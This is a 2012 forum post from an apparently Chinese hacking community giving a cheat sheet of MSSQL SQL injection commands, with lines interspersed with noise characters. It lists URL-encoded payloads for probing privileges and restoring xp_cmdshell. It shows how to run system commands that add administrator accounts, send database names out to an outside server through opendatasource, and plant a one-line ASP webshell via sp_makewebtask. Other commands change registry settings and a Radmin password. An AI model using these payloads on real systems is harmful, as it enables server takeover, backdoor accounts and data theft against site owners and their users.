找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2009|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
//看看是什么权限的
3 B1 B' o2 h$ R1 X! k5 k, Hand 1=(Select IS_MEMBER('db_owner'))- O9 w( ]; Z4 }0 N# X- H( J8 L
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
8 X& d1 w4 |; O7 r
/ Y) @  W1 H8 u, |//检测是否有读取某数据库的权限
& [/ U! @/ N, e7 k1 Zand 1= (Select HAS_DBACCESS('master'))
0 E6 s  v/ k6 i' v5 KAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --. X# y  T  F5 `9 V2 p2 z- O
$ r$ R3 S# w+ W& O/ B3 F
8 {: }9 Y! k7 {" S( `
数字类型
* O$ h) S; ]2 {  }' k2 a: \and char(124)%2Buser%2Bchar(124)=0, v/ B! K: j3 P" n! F# x" i  F
, t) d0 s3 f& i5 Q) c, ^6 C
字符类型
7 t  F) K( u' V' and char(124)%2Buser%2Bchar(124)=0 and ''='4 l& i3 K1 i- R0 x
1 Y, @! c* {9 t, [
搜索类型; m% |$ m9 k) d
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
& }4 R8 \; M: H# U& [# Y: u
9 k  v, I/ P, g  l, k爆用户名
) x8 u8 h1 {0 h* Yand user>0
& |1 X' D; n' i' and user>0 and ''='
* p* \) R& C( x: `8 f& U( V( K' m$ s% R% Z8 m, R5 K
检测是否为SA权限3 Z) _; m  [' P% c5 a# r2 m
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--. r( `4 @% C+ ^, |% Z. Z# f/ L
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
" ~4 G4 n" ]3 r; u6 N# B. z; L3 ^0 l* d4 C
检测是不是MSSQL数据库
; p0 s+ E$ u7 p* qand exists (select * from sysobjects);--
6 O; a# G0 |) L) {2 x0 r  W' s; |
; Y; g5 L, f* l. @, T( f7 Q检测是否支持多行% c# [5 E! g9 P( Y
;declare @d int;--
6 R0 v1 Y* n; i: L% H) F6 _- s0 G) B: h: Z8 L  O7 L1 @
恢复 xp_cmdshell
$ @0 L& G: F. W( {;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
2 z4 ?. a! p7 o* G4 d2 \( J
; a* ?# U8 b7 Y* E( F8 _  h% R7 G, V, b, @, {
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')* P2 N# f- |$ ?, C  q# X

6 U& g# G: R" K5 G( Z& [+ j, H//-----------------------
4 i2 s6 s7 Q! I% d! ~//       执行命令7 p% t* B, H3 Y) Y! E
//-----------------------
& K5 l6 |2 c0 ]: k首先开启沙盘模式:
/ }# ?. \/ i0 B5 Sexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
' k, [& c1 K  W9 M6 D/ A6 {1 v) l: ?. f8 y# Z- \. t$ R
然后利用jet.oledb执行系统命令9 d' R8 p9 x0 [2 O/ r' e
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
  U3 e( S# p; e) T4 P) y1 d" u1 k1 L* g' m
执行命令0 T4 N" f0 w) e9 @
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
/ E+ f/ _, Q5 N0 Y! l3 p
  |, c6 I) t) H* L0 @7 q4 rEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'4 p; X: h, q" i, o, W! O
; s/ G) X' q1 A8 R/ ~) ]- T
判断xp_cmdshell扩展存储过程是否存在:6 O2 U! }/ O5 ]7 L9 P8 I
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')) A  L" n# `+ y
( H+ T  _) @5 b% a
写注册表) ~2 n8 `* I) v  }  p# V
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! m2 h9 \, o' j* D9 ~. x
& Z4 |% \  v3 ^7 r' f: eREG_SZ8 o* t" W( U- L6 T
4 d2 B0 N7 O6 ^9 c, v, M
读注册表5 P+ _9 h, d& H/ c0 k+ L; q, y
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
7 ^& R8 d; n4 Q4 _7 G2 d; B
3 c7 t' ]! w, P3 r2 `读取目录内容
3 ?' D) T# C. I) {2 I9 aexec master..xp_dirtree 'c:\winnt\system32\',1,11 S; H9 p- h! N, \* f( T' x1 o# m
3 i# }* ^) C8 s3 [+ Y1 ~( n
" w1 `9 G5 _5 G5 K) b
数据库备份8 N6 H' `  A. R" R; C( p  l
backup database pubs to disk = 'c:\123.bak'* y8 ^  B1 v" Y2 B. r1 o
% f/ I* |0 |! z: r* Y
//爆出长度5 }! n9 J0 E! l4 f, D! E/ Z) u. W$ ^
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
6 O: o/ S2 q6 Q2 H6 W- }
* u9 L' H% u7 `" R( m* J: h8 a& b; T  s$ ?, w& a2 o9 L
! @: z# S4 c+ E
更改sa口令方法:用sql综合利用工具连接后,执行命令:
- S4 p* s8 F. v2 \7 g9 o5 h5 u2 Oexec sp_password NULL,'新密码','sa'
- \1 k9 I, ^' V" G. U! X" l2 ^
" u5 c& j2 y$ q7 c6 c: b* g0 q. C添加和删除一个SA权限的用户test:
  _. P" H% K2 X- m" `  c7 |; Mexec master.dbo.sp_addlogin test,9530772
' ]* p0 M/ B0 u; ?exec master.dbo.sp_addsrvrolemember test,sysadmin( |7 [! b6 \8 z( G

3 r# D! s7 F" K$ J删除扩展存储过过程xp_cmdshell的语句:
8 z/ x, k: E+ p0 ]9 O5 ], M3 ?1 Xexec sp_dropextendedproc 'xp_cmdshell'' A( w, [0 l& V2 q  }. E9 C' F

$ e6 D2 E' J$ n  N1 L4 u# [" U添加扩展存储过过程
/ k# @4 _3 l3 H, P; Q. m7 v: nEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
+ j! ?- {" Z# lGRANT exec On xp_proxiedadata TO public
& @- ]# {% w7 k$ M  X4 B1 N! K/ V
- I+ n) g: I3 p# u; ?( U4 s; h; f* f  O
停掉或激活某个服务。0 T5 e0 I; k& `) D6 a% a. z1 s

9 R' u5 c9 [, ]5 ^& Y& [& mexec master..xp_servicecontrol 'stop','schedule'
* Y* N; D  ^: k- uexec master..xp_servicecontrol 'start','schedule'. E8 M- X  J8 i% a

! d' ~; C: `; R1 z& W4 L" y4 pdbo.xp_subdirs
2 c- W2 C  k! u& ~9 o
; o5 w6 W+ ~5 p9 N3 K# ?只列某个目录下的子目录。; X$ Y) {8 N$ {* o3 U- {: e& I, J
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'  @! N1 b4 R, ^

; D. T' B1 W5 ~/ k& J4 U4 x) ndbo.xp_makecab$ e5 t- C- R6 e; v. _

( ^$ f; S5 ^3 P! ?8 e: o# i将目标多个档案压缩到某个目标档案之内。& w3 ~9 K( }% U) m. p( X; [
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。5 o' ^$ B2 u! C) w

- b* h+ _& j1 Q- y8 [  u' j4 O2 z; Cdbo.xp_makecab8 @/ F2 F) Q% Q7 n
'c:\test.cab','mszip',1,+ y/ G7 `  T0 }& v+ F
'C:\Inetpub\wwwroot\SQLInject\login.asp',5 g8 S! L4 G  X+ h3 J1 [% J
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'$ K# k$ n: f( Y5 X  E2 |& L  N
; \( X7 a, W6 L) z/ v& ?
xp_terminate_process, Y; m$ H# Z; B7 }

, F( `& e1 H: s, Z. r! {# i停掉某个执行中的程序,但赋予的参数是 Process ID。" r8 ]4 n& f2 N4 y5 p
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
' W9 H1 S2 N7 _2 a" ~8 Z6 N" m+ v0 {' Z! \/ I  k' Y/ U7 B* j
xp_terminate_process 2484
% A- I2 E/ v0 b* O( |' e; q, ]
9 Q( ^" Z8 \" p0 W/ I; b6 B( k2 gxp_unpackcab% a  [' T% i0 @6 |" S- Q; n

, i/ e; B. \6 Y# F0 q$ p解开压缩档。
9 O1 `, q4 K! l" K
; j! y" f$ r5 t" qxp_unpackcab 'c:\test.cab','c:\temp',1# c4 l  L7 T4 J/ ~

; W2 b9 S3 i4 g' J8 o
, G( Y2 g/ P9 C+ Q5 N" C* C, \某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
1 ?  P2 `! t; Z, l) o" _; q' j" R  O. w$ E8 l5 V/ S+ X5 \
create database lcx;8 R( Z, u4 N# j6 M, i) o
Create TABLE ku(name nvarchar(256) null);' l$ C' @! s( ^
Create TABLE biao(id int NULL,name nvarchar(256) null);1 M7 K+ V7 R& X; W( B1 y% P
: _' R: S, J/ S0 r4 F0 J
//得到数据库名: W1 P4 L! @# v* j$ {8 E9 G' ]/ k2 C, U
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
9 k- e+ q0 ^) `/ M9 P
  t9 ?  ^8 F! M, M& X
8 j/ x. \, J* G3 V//在Master中创建表,看看权限怎样: q# w5 T5 ~/ H, p
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
! b, g3 f' x1 N1 t, ?+ E
5 [) U# R' F- n1 U: u, ~4 b用 sp_makewebtask直接在web目录里写入一句话马:
" ~( c1 l6 x; I1 d* xhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
% A2 w5 L: U, {% K4 S
. P+ `+ C5 [  f, p5 [" i: q# J3 I//更新表内容
; D+ J! a2 x- T; yUpdate films SET kind = 'Dramatic' Where id = 1236 \+ \- e( E0 }5 S. J$ v4 }
; K- P1 Z4 B" g8 M% u" b
//删除内容
' E, f3 l% Y+ U0 ^' k6 Mdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表